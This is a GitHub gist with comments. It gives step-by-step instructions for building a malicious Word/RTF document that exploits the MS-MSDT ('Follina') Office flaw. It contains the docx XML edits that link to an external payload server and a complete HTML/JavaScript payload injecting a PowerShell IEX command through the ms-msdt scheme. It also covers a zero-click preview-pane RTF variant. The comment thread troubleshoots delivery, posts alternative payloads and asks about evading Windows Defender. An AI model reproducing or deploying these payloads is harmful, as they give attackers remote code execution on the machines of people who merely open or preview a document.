Skip to content

Instantly share code, notes, and snippets.

@tothi
Last active Jun 25, 2022
Embed
What would you like to do?
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

  2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute

Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:

Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Note the Id value (probably it is "rId5").

  1. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id="rd5") and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".

NOTE: The created malicious docx is almost the same as for CVE-2021-44444.

  1. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at http://<payload_server>/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).

BONUS (0-click RTF version)

If you also add these elements under the <o:OLEObject> element in word/document.xml at step 3:

<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

then it'll work as RTF also (open the resulting docx and save it as RTF).

With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. :)

@aidenmitchell
Copy link

aidenmitchell commented May 30, 2022

  1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
  2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.

I'm probably doing something wrong...

@GABRlEL
Copy link

GABRlEL commented May 30, 2022

  1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
  2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.

I'm probably doing something wrong...

Don't go for a un- and rezip, replace the files with their modified files instead.
I used 7-Zip and it worked.

@sin9yt
Copy link

sin9yt commented May 30, 2022

  1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
  2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.

I'm probably doing something wrong...

Have you added the //AAA commented line > 60 lines? I made the mistake of skipping the step and had the same issue before, adding it worked for me

@TaylorHassall
Copy link

TaylorHassall commented May 31, 2022

  1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
  2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.

I'm probably doing something wrong...

@aidenmitchell In addition to the above, make sure you're not opening X.docx\_rels. It's the x.docx\word\_rels folder you're after. I did this twice without realising. Launching it the first time appears to work but launching the same doc a second time appears to not work.

@y11en
Copy link

y11en commented May 31, 2022

RTF:

<o:OLEObject Type="Link" ProgID="htmlfile" UpdateMode="OnCall"  ...

<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

</o:OLEObject>

payload.html:


<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ....
// .....  Repeated many times as possible
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ....

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression('mspaint'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

</script>

</body>
</html>


@Kami-11094
Copy link

Kami-11094 commented May 31, 2022

I didn't pop up the calc when I finally opened docx. When I manually run MSDT, I need to enter the key. Does that matter?

@egotisticalgiraffe
Copy link

egotisticalgiraffe commented May 31, 2022

Doesn't appear to work on Office365 installations.

@GABRlEL
Copy link

GABRlEL commented May 31, 2022

Doesn't appear to work on Office365 installations.

I honestly feel like, it works and some and doesn't on others. It works on my German install of Microsoft 365 Apps for Enterprise (Version 2108, Build 14326.20962 Click-and-Go, semi-annual).
You might be able to try this suggestion: https://twitter.com/chvancooten/status/1531272978549420034

@reaper987
Copy link

reaper987 commented May 31, 2022

Maybe I did something wrong, because the file didn't launch the calculator. I've created new word file, Insert->Object->Bitmap Image, draw a line in Paint and inserted in Word file. I renamed the file as .zip, edited the files through 7-zip. I added the comment line 61 times, I'm running IIS on local Windows 10 20H2 and can access the default site from browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open diagnostic tool and when I do, it request a key, same as for user Kami-11094 above.

@GABRlEL
Copy link

GABRlEL commented May 31, 2022

Maybe I did something wrong, because the file didn't launch the calculator. I've created new word file, Insert->Object->Bitmap Image, draw a line in Paint and inserted in Word file. I renamed the file as .zip, edited the files through 7-zip. I added the comment line 61 times, I'm running IIS on local Windows 10 20H2 and can access the default site from browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open diagnostic tool and when I do, it request a key, same as for user Kami-11094 above.

Are you trying to access the file via localhost or your IP? When hosting an apache server using XAMPP on my machine, I can access the payload with http://127.0.0.1/mal.html for example.

@reaper987
Copy link

reaper987 commented May 31, 2022

Maybe I did something wrong, because the file didn't launch the calculator. I've created new word file, Insert->Object->Bitmap Image, draw a line in Paint and inserted in Word file. I renamed the file as .zip, edited the files through 7-zip. I added the comment line 61 times, I'm running IIS on local Windows 10 20H2 and can access the default site from browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open diagnostic tool and when I do, it request a key, same as for user Kami-11094 above.

Are you trying to access the file via localhost or your IP? When hosting an apache server using XAMPP on my machine, I can access the payload with http://127.0.0.1/mal.html for example.

Via http://localhost/payload.html

@draguntsow
Copy link

draguntsow commented May 31, 2022

Great research, thanks! Works perfectly as for Word 2016, however could not verify exploitability on Word 2019 2205 (16.0.15225.200228) - maybe, this version has already received an update.

@Ghostdust-u
Copy link

Ghostdust-u commented Jun 1, 2022

When I open the payload.html in Chrome, it asks if I want to open diagnostic tool and when I do, it request a key,Is that why I failed in my attempt?

@redbaron4
Copy link

redbaron4 commented Jun 1, 2022

Is this supposed to work in Word-2007? I followed all the steps but the doc file says "Word found unreadable content in xxx. Do you want to recover the contents of this document?" When I click Yes, the HTTP call for .html file goes through (I can see it in access logs on the HTTP server) but nothing happens on the desktop.

@Ghostdust-u
Copy link

Ghostdust-u commented Jun 1, 2022

通过chrome打开payload.html时提示需要输入密码,但这并不影响漏洞的利用,我在office word 2016复现成功了

@TaylorHassall
Copy link

TaylorHassall commented Jun 1, 2022

Doesn't appear to work on Office365 installations.

@egotisticalgiraffe
@draguntsow

Can confirm it does. Latest version 2205 is not affected by this and is patched.

@IGNTom
Copy link

IGNTom commented Jun 1, 2022

reg delete HKEY_CLASSES_ROOT\ms-msdt /f is the new way to patch this CVE so if your installation (as mine) didnt activate it by default, try to activate it manually.
This could finally permit you to run your payload.

@Numerok
Copy link

Numerok commented Jun 1, 2022

exploit is somewhat working, but I have to manually update linked object, how to make it so it would do it automatically?
tried using always instead of oncall but had no luck with it.
rtf also doesn't work
tested on office 2021 (2204 16.0.15128.20128)
and on office 2019 (2205 16.0.15225.20212)

@irsl
Copy link

irsl commented Jun 2, 2022

This may be an alternative payload to bypass evasions:
"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic -af C:\PCW8E57.xml /skip TRUE
(see here: https://lolbas-project.github.io/lolbas/Binaries/Msdt/)

@irsl
Copy link

irsl commented Jun 3, 2022

Save everything you don't want to loose, then:

window.location.href = "ms-cxh-full:sdf"

@KaMiAyin
Copy link

KaMiAyin commented Jun 3, 2022

Modify target to target= "mhtml: http://127.0.0.1/payload.html ! x-usc: http://127.0.0.1/payload.html "

@machine1337
Copy link

machine1337 commented Jun 3, 2022

@irsl
Did u bypass window defender?

@Werew1942
Copy link

Werew1942 commented Jun 8, 2022

Not working on win11, Word 2019. But I see the requests to python's http server

@106-Sam
Copy link

106-Sam commented Jun 11, 2022

@Werew1942 You need to check your payload.html file. It might have some errors

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment